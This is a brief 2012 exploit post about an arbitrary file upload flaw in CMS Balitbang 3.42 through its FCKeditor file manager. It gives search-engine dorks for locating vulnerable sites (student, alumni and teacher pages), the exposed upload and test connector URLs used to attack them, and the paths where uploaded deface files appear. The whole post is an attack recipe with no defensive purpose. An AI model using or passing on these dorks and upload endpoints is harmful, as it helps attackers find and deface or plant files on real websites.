| Filename | CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads |
| Permission | rw-r--r-- |
| Author | amiqmuzad |
| Date and Time | 3/17/2012 |
| Label | ./FileUp |
| Action |
### CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads ###
[-]Dork :
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
[-] Exploit :
- http://public_html/dir/editor/filemanager/connectors/uploadtest.html
- http://public_html/dir/editor/filemanager/connectors/test.html
- http://public_html/dir/editor/filemanager/browser/default/browser.html
[-] Cihuy :D :
- http://public_html/userfiles/file/file-deface.txt
- http://public_html/userfiles/file-deface.txt
0 komentar:
Posting Komentar